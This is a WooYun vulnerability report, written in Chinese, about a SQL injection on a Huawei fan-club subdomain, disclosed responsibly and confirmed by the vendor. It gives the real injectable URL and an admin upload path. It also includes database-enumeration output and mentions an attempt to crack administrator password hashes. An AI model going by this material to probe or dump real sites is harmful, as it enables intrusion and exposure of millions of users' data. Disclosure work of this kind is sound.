当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056802

漏洞标题:华为某分站sql注射漏洞

相关厂商:华为技术有限公司

漏洞作者: Jacob

提交时间:2014-04-15 10:48

修复时间:2014-05-30 10:48

公开时间:2014-05-30 10:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-15: 细节已通知厂商并且等待厂商处理中
2014-04-16: 厂商已经确认,细节仅向厂商公开
2014-04-26: 细节向核心白帽子及相关领域专家公开
2014-05-06: 细节向普通白帽子公开
2014-05-16: 细节向实习白帽子公开
2014-05-30: 细节向公众公开

简要描述:

最近都在抢华为手机,我也来凑凑热闹~

详细说明:

注射点:
http://fp.huafans.cn/?f=events&on=show&id=7090

available databases [4]:
[*] duihao_hw
[*] emotionui
[*] information_schema
[*] test


另外还有一处上传点
http://fp.huafans.cn/admin/upload.php

漏洞证明:

Database: duihao_hw
[32 tables]
+---------------------+
| jo2_admin           |
| jo2_admin_role      |
| jo2_admin_role_priv |
| jo2_adminrole       |
| jo2_app             |
| jo2_area            |
| jo2_cate            |
| jo2_choujiang       |
| jo2_comment         |
| jo2_config          |
| jo2_content         |
| jo2_content_text    |
| jo2_dictionary      |
| jo2_favorite        |
| jo2_file            |
| jo2_im              |
| jo2_integral        |
| jo2_keywords        |
| jo2_link            |
| jo2_lipin           |
| jo2_menu            |
| jo2_message         |
| jo2_model           |
| jo2_model_field     |
| jo2_model_fields    |
| jo2_sendmail        |
| jo2_session         |
| jo2_task            |
| jo2_type            |
| jo2_user            |
| jo2_vote            |
| jo2_zuopin          |
+---------------------+


管理员md5一个都没解出来。。。
emotionui裤貌似有“花粉俱乐部”700多W会员数据:
http://cn.club.vmall.com/

Database: emotionui
[355 tables]
+------------------------------------+
| accounts_topic                     |
| emui_version_record                |
| pre_common_addon                   |
| pre_common_admincp_cmenu           |
| pre_common_admincp_group           |
| pre_common_admincp_member          |
| pre_common_admincp_perm            |
| pre_common_admincp_session         |
| pre_common_admingroup              |
| pre_common_adminnote               |
| pre_common_advertisement           |
| pre_common_advertisement_custom    |
| pre_common_banned                  |
| pre_common_block                   |
| pre_common_block_favorite          |
| pre_common_block_item              |
| pre_common_block_item_data         |
| pre_common_block_permission        |
| pre_common_block_pic               |
| pre_common_block_style             |
| pre_common_block_xml               |
| pre_common_cache                   |
| pre_common_card                    |
| pre_common_card_log                |
| pre_common_card_type               |
| pre_common_credit_log              |
| pre_common_credit_rule             |
| pre_common_credit_rule_log         |
| pre_common_credit_rule_log_field   |
| pre_common_cron                    |
| pre_common_district                |
| pre_common_diy_data                |
| pre_common_domain                  |
| pre_common_failedlogin             |
| pre_common_friendlink              |
| pre_common_grouppm                 |
| pre_common_invite                  |
| pre_common_magic                   |
| pre_common_magiclog                |
| pre_common_mailcron                |
| pre_common_mailqueue               |
| pre_common_member                  |
| pre_common_member_action_log       |
| pre_common_member_connect          |
| pre_common_member_count            |
| pre_common_member_field_forum      |
| pre_common_member_field_home       |
| pre_common_member_grouppm          |
| pre_common_member_log              |
| pre_common_member_magic            |
| pre_common_member_profile          |
| pre_common_member_profile_setting  |
| pre_common_member_security         |
| pre_common_member_stat_field       |
| pre_common_member_stat_fieldcache  |
| pre_common_member_stat_search      |
| pre_common_member_stat_searchcache |
| pre_common_member_status           |
| pre_common_member_validate         |
| pre_common_member_verify           |
| pre_common_member_verify_info      |
| pre_common_moderate                |
| pre_common_myapp                   |
| pre_common_myinvite                |
| pre_common_mytask                  |
| pre_common_nav                     |
| pre_common_onlinetime              |
| pre_common_plugin                  |
| pre_common_pluginvar               |
| pre_common_process                 |
| pre_common_regip                   |
| pre_common_relatedlink             |
| pre_common_report                  |
| pre_common_searchindex             |
| pre_common_secquestion             |
| pre_common_session                 |
| pre_common_setting                 |
| pre_common_smiley                  |
| pre_common_sphinxcounter           |
| pre_common_stat                    |
| pre_common_statuser                |
| pre_common_style                   |
| pre_common_stylevar                |
| pre_common_syscache                |
| pre_common_tag                     |
| pre_common_tagitem                 |
| pre_common_task                    |
| pre_common_taskvar                 |
| pre_common_template                |
| pre_common_template_block          |
| pre_common_template_permission     |
| pre_common_uin_black               |
| pre_common_usergroup               |
| pre_common_usergroup_field         |
| pre_common_word                    |
| pre_common_word_type               |
| pre_connect_feedlog                |
| pre_connect_memberbindlog          |
| pre_connect_tlog                   |
| pre_down_rom_log                   |
| pre_down_rom_newlog                |
| pre_dsu_paulsign                   |
| pre_dsu_paulsignset                |
| pre_emotion_activity               |
| pre_emotion_addflower              |
| pre_emotion_adimage_config         |
| pre_emotion_apply                  |
| pre_emotion_bug                    |
| pre_emotion_bug_module             |
| pre_emotion_bug_user               |
| pre_emotion_clubinfo               |
| pre_emotion_config                 |
| pre_emotion_download_restore_file  |
| pre_emotion_forumthread            |
| pre_emotion_gongge_emotion         |
| pre_emotion_gongge_expectation     |
| pre_emotion_gongge_feedback        |
| pre_emotion_gongge_model           |
| pre_emotion_gongge_relation        |
| pre_emotion_gongge_satisfaction    |
| pre_emotion_gongge_statistics      |
| pre_emotion_gongge_topic           |
| pre_emotion_gongge_unsatisfactory  |
| pre_emotion_gongge_version         |
| pre_emotion_group_class            |
| pre_emotion_homeindex              |
| pre_emotion_interface_devices      |
| pre_emotion_lastmodel              |
| pre_emotion_lasttr                 |
| pre_emotion_login                  |
| pre_emotion_logregister            |
| pre_emotion_model                  |
| pre_emotion_model_version          |
| pre_emotion_mysetting              |
| pre_emotion_olympic                |
| pre_emotion_otherweibo             |
| pre_emotion_petal                  |
| pre_emotion_prov_post              |
| pre_emotion_province               |
| pre_emotion_registerlogin          |
| pre_emotion_reinfo                 |
| pre_emotion_shorturl               |
| pre_emotion_slider                 |
| pre_emotion_sohu_attach            |
| pre_emotion_sohu_photo             |
| pre_emotion_sohu_photo_pollvoter   |
| pre_emotion_sohu_photo_recommend   |
| pre_emotion_theme                  |
| pre_emotion_theme_comment          |
| pre_emotion_tidbanlist             |
| pre_emotion_transactionfailure     |
| pre_emotion_uidbanlist             |
| pre_emotion_univ                   |
| pre_emotion_univ_hot               |
| pre_emotion_univ_member            |
| pre_emotion_unlock_count           |
| pre_emotion_unlock_log             |
| pre_emotion_user_count             |
| pre_emotion_version                |
| pre_emotion_wallpaper              |
| pre_emotion_wallpaper_comment      |
| pre_emotion_weibo                  |
| pre_fansapk_count                  |
| pre_forum_access                   |
| pre_forum_activity                 |
| pre_forum_activityapply            |
| pre_forum_announcement             |
| pre_forum_attachment               |
| pre_forum_attachment_0             |
| pre_forum_attachment_1             |
| pre_forum_attachment_2             |
| pre_forum_attachment_3             |
| pre_forum_attachment_4             |
| pre_forum_attachment_5             |
| pre_forum_attachment_6             |
| pre_forum_attachment_7             |
| pre_forum_attachment_8             |
| pre_forum_attachment_9             |
| pre_forum_attachment_unused        |
| pre_forum_attachtype               |
| pre_forum_bbcode                   |
| pre_forum_creditslog               |
| pre_forum_debate                   |
| pre_forum_debatepost               |
| pre_forum_faq                      |
| pre_forum_forum                    |
| pre_forum_forum_threadtable        |
| pre_forum_forumfield               |
| pre_forum_forumrecommend           |
| pre_forum_groupcreditslog          |
| pre_forum_groupfield               |
| pre_forum_groupinvite              |
| pre_forum_grouplevel               |
| pre_forum_groupranking             |
| pre_forum_groupuser                |
| pre_forum_imagetype                |
| pre_forum_medal                    |
| pre_forum_medallog                 |
| pre_forum_memberrecommend          |
| pre_forum_moderator                |
| pre_forum_modwork                  |
| pre_forum_onlinelist               |
| pre_forum_order                    |
| pre_forum_poll                     |
| pre_forum_polloption               |
| pre_forum_pollvoter                |
| pre_forum_post                     |
| pre_forum_post_tableid             |
| pre_forum_postcomment              |
| pre_forum_postlog                  |
| pre_forum_postposition             |
| pre_forum_poststick                |
| pre_forum_promotion                |
| pre_forum_ratelog                  |
| pre_forum_relatedthread            |
| pre_forum_replycredit              |
| pre_forum_rsscache                 |
| pre_forum_spacecache               |
| pre_forum_statlog                  |
| pre_forum_thread                   |
| pre_forum_thread_copy              |
| pre_forum_threadclass              |
| pre_forum_threadimage              |
| pre_forum_threadlog                |
| pre_forum_threadmod                |
| pre_forum_threadpartake            |
| pre_forum_threadrush               |
| pre_forum_threadtype               |
| pre_forum_trade                    |
| pre_forum_tradecomment             |
| pre_forum_tradelog                 |
| pre_forum_typeoption               |
| pre_forum_typeoptionvar            |
| pre_forum_typevar                  |
| pre_forum_uid_temp                 |
| pre_forum_warning                  |
| pre_home_album                     |
| pre_home_album_category            |
| pre_home_appcreditlog              |
| pre_home_blacklist                 |
| pre_home_blog                      |
| pre_home_blog_category             |
| pre_home_blogfield                 |
| pre_home_class                     |
| pre_home_click                     |
| pre_home_clickuser                 |
| pre_home_comment                   |
| pre_home_docomment                 |
| pre_home_doing                     |
| pre_home_favorite                  |
| pre_home_feed                      |
| pre_home_feed_app                  |
| pre_home_friend                    |
| pre_home_friend_request            |
| pre_home_friendlog                 |
| pre_home_notification              |
| pre_home_pic                       |
| pre_home_picfield                  |
| pre_home_poke                      |
| pre_home_pokearchive               |
| pre_home_share                     |
| pre_home_show                      |
| pre_home_specialuser               |
| pre_home_userapp                   |
| pre_home_userappfield              |
| pre_home_visitor                   |
| pre_league_table                   |
| pre_modpay_checklog                |
| pre_modpay_join                    |
| pre_modpay_joinlog                 |
| pre_modpay_moneylog                |
| pre_modpay_operatelog              |
| pre_modpay_paylog                  |
| pre_modpay_policies                |
| pre_modpay_prtable                 |
| pre_modpay_ratelog                 |
| pre_myrepeats                      |
| pre_mysetting_unlock               |
| pre_phone_list                     |
| pre_phone_rom_department           |
| pre_phone_rom_list                 |
| pre_phone_rom_model                |
| pre_phone_rom_newrom               |
| pre_phone_rom_type                 |
| pre_phone_tutorial_step            |
| pre_phone_tutorial_step_link       |
| pre_plugin_auction                 |
| pre_plugin_auction_message         |
| pre_plugin_auction_xml             |
| pre_plugin_auctionapply            |
| pre_plugin_wheel_share             |
| pre_portal_article_content         |
| pre_portal_article_count           |
| pre_portal_article_related         |
| pre_portal_article_title           |
| pre_portal_article_trash           |
| pre_portal_attachment              |
| pre_portal_category                |
| pre_portal_category_permission     |
| pre_portal_comment                 |
| pre_portal_rsscache                |
| pre_portal_topic                   |
| pre_portal_topic_pic               |
| pre_private_beta                   |
| pre_private_beta_pad               |
| pre_security_evilpost              |
| pre_security_eviluser              |
| pre_security_failedlog             |
| pre_temp_medal                     |
| pre_ucenter_admins                 |
| pre_ucenter_applications           |
| pre_ucenter_badwords               |
| pre_ucenter_domains                |
| pre_ucenter_failedlogins           |
| pre_ucenter_feeds                  |
| pre_ucenter_friends                |
| pre_ucenter_mailqueue              |
| pre_ucenter_memberfields           |
| pre_ucenter_members                |
| pre_ucenter_mergemembers           |
| pre_ucenter_newpm                  |
| pre_ucenter_notelist               |
| pre_ucenter_pm_indexes             |
| pre_ucenter_pm_lists               |
| pre_ucenter_pm_members             |
| pre_ucenter_pm_messages_0          |
| pre_ucenter_pm_messages_1          |
| pre_ucenter_pm_messages_2          |
| pre_ucenter_pm_messages_3          |
| pre_ucenter_pm_messages_4          |
| pre_ucenter_pm_messages_5          |
| pre_ucenter_pm_messages_6          |
| pre_ucenter_pm_messages_7          |
| pre_ucenter_pm_messages_8          |
| pre_ucenter_pm_messages_9          |
| pre_ucenter_protectedmembers       |
| pre_ucenter_settings               |
| pre_ucenter_sqlcache               |
| pre_ucenter_tags                   |
| pre_ucenter_vars                   |
| pre_want_record                    |
| t_test_1                           |
| tb_app                             |
| tb_apply                           |
| tb_city                            |
| tb_config                          |
| tb_lottery                         |
| tb_lottery2                        |
| tb_prize                           |
| tb_prize2                          |
| tb_share                           |
| tb_user                            |
| tb_vote                            |
| tb_wallpaper                       |
| ts_x_attach                        |
+------------------------------------+

修复方案:

版权声明:转载请注明来源 Jacob@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-16 10:01

厂商回复:

用户重要数据有加密保护,不过注入漏洞危害大,感谢白帽子关注。

最新状态:

暂无